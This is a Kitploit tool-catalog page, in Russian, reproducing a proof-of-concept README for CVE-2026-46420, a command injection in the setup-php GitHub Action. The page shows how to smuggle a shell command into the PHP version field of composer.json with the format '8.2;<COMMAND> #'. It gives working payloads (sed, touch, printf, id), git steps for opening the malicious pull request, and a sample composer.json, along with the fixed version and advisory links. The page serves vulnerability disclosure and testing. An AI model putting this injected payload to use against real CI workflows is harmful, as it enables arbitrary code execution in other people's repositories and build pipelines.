Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-46420 — PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution. | Kitploit
Инструменты/GitHubGitHub/jvr2022/cve-2026-46420
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution.

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-46420 PoC

Инъекция команд в shivammathur/setup-php, когда версия PHP загружается из файлов, контролируемых репозиторием.

Затронуто:

root@kitploit:~
>= 2.25.0, < 2.37.1

Исправлено:

root@kitploit:~
>= 2.37.1

PoC

В целевом репозитории уже есть уязвимый workflow, который извлекает содержимое pull request и запускает [email protected].

Атакующий изменяет только composer.json.

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

Когда setup-php считывает версию PHP из composer.json, внедрённая команда включается в сгенерированный shell-скрипт и выполняется.

Результат:

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

Воспроизведение

Создайте ветку из целевого репозитория:

root@kitploit:~
git checkout -b poc-test

Замените чистый composer.json на версию PoC:

root@kitploit:~
cp attacker/composer.json composer.json

Зафиксируйте изменения и отправьте:

root@kitploit:~
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test

Откройте pull request из ветки poc-test в ветку main.

Запуск Actions должен показать, что demo-app/.env.example был изменён на шаге setup-php.

Изменение команды

Формат полезной нагрузки:

root@kitploit:~
8.2;<COMMAND> #

Текущая полезная нагрузка:

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

Выполняемая команда:

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

Чтобы изменить действие PoC, замените команду между 8.2; и #.

Создать файл:

root@kitploit:~
8.2;touch poc-executed #

Записать в файл:

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

Вывести результат команды:

root@kitploit:~
8.2;id #

Пример composer.json:

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

Исправление

Обновитесь до [email protected] или новее.

Та же полезная нагрузка отклоняется на исправленной версии.

Ссылки

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

Скачать инструмент